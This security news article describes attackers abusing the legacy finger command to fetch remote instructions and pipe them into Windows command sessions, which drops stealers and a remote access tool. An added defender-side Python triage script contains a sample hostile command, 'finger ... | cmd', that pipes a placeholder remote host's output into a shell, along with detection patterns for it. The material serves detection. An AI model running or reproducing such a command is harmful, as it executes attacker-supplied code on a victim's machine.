- The “finger” command remains exploitable for remote code execution, even after years of disuse
- Attackers use batch scripts to channel server responses directly into Windows command sessions
- Hidden Python programs are delivered through archives disguised as harmless documents
The finger command is an old network lookup tool originally used to retrieve basic information about remote or local system users on Unix and later on Windows.
It was gradually abandoned as modern authentication and user-lookup systems became standard, but this decade-old threat has now apparently re-emerged, quietly, in malicious operations that target users who unknowingly execute remote instructions pulled through the outdated protocol.
The method relies on retrieving text-based commands from a remote finger server and running them locally through standard Windows command execution.
Old but still dangerous
Interest in this activity resurfaced when a researcher examined a batch script that issued a finger request to a remote server and then routed the response into a live Windows command session.
The referenced server has since stopped responding, although additional samples showing similar behavior were later linked to ongoing attacks.
One example involved a victim who believed they were completing a human verification step, but who actually ran a command that queried a finger address, with the output flowing directly into a command processor session.
Although the server is no longer responsive, the previously captured output showed a sequence that created random paths, cloned a system utility, and extracted a compressed archive disguised as a harmless document.
Inside that archive was a Python program that started through pythonw.exe and later contacted a remote server to confirm execution.
A related batch file suggested that the package contained an information stealer rather than a harmless testing tool.
Another campaign used a similar request pattern but targeted a different server and delivered almost identical automation.
Analysts observed that this version scanned for common reverse-engineering and monitoring tools and exited if any were detected, a level of environmental awareness often seen in staged malware activity.
If no such tools were found, the script downloaded a separate compressed file containing a known remote access tool used for unauthorized control sessions, then created a scheduled task that launches it every time the user logs on.
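As an added defender-side illustration, not code from the article or the researchers it cites, the following Python triage runs over constructed Sysmon-style process-creation records and flags the behaviours described above: finger output piped into a shell, pythonw.exe launched from a temp path, and a logon-triggered scheduled task pointing at that path. The event fields, file paths and host name are assumptions.

```python
import re
from typing import Dict, List

# Constructed Sysmon Event ID 1 style records; not real telemetry. Host name is a placeholder.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c "finger user@finger.example.invalid | cmd"'},
    {"image": r"C:\Windows\System32\finger.exe",
     "cmdline": "finger user@finger.example.invalid"},
    {"image": r"C:\Users\alice\AppData\Local\Temp\x9f3\pythonw.exe",
     "cmdline": r"pythonw.exe C:\Users\alice\AppData\Local\Temp\x9f3\run.py"},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc onlogon /tn Updater /tr "C:\Users\alice\AppData\Local\Temp\x9f3\rat.exe"'},
    {"image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

# (rule name, severity, event field to inspect, pattern). Rules are checked in this order.
RULES = [
    ("finger_output_piped_to_shell", "high", "cmdline",
     re.compile(r"\bfinger(?:\.exe)?\b[^|]*\|\s*(?:cmd|powershell|pwsh)", re.I)),
    # finger.exe is almost never used legitimately on modern Windows, so any run is worth noting.
    ("finger_client_executed", "low", "image", re.compile(r"\\finger\.exe$", re.I)),
    ("pythonw_from_user_writable_path", "medium", "image",
     re.compile(r"\\(?:AppData|Temp|ProgramData|Downloads)\\.*\\pythonw\.exe$", re.I)),
    ("logon_task_pointing_to_user_writable_path", "medium", "cmdline",
     re.compile(r"schtasks.*/create.*/sc\s+onlogon.*(?:AppData|Temp|ProgramData)", re.I)),
]

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3}


def triage(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per (event, matching rule), in event order."""
    findings = []
    for ev in events:
        for name, severity, field, pattern in RULES:
            if pattern.search(ev.get(field, "")):
                findings.append({"rule": name, "severity": severity, "image": ev["image"]})
    return findings


def verdict(findings: List[Dict[str, str]]) -> str:
    """Roll findings up to a host label; two medium signals together also warrant a look."""
    if not findings:
        return "clean"
    top = max(SEVERITY_RANK[f["severity"]] for f in findings)
    mediums = sum(1 for f in findings if f["severity"] == "medium")
    return "investigate" if top == 3 or mediums >= 2 else "review"


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['severity']:6}] {f['rule']:44} {f['image']}")
    print("verdict:", verdict(triage(SAMPLE_EVENTS)))
```

The pipe rule is the one worth alerting on by itself; the other three are corroborating signals that score highest when they appear together on the same host.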
This abuse appears to involve a single actor, although unconnected victims continue to report similar incidents.
Users are reminded that safe handling of data still requires up-to-date antivirus software, reliable malware removal practices and a properly configured firewall.
It may sound strange that an older lookup tool still poses a risk, but older protocols can still create real entry points when combined with social engineering.
Via BleepingComputer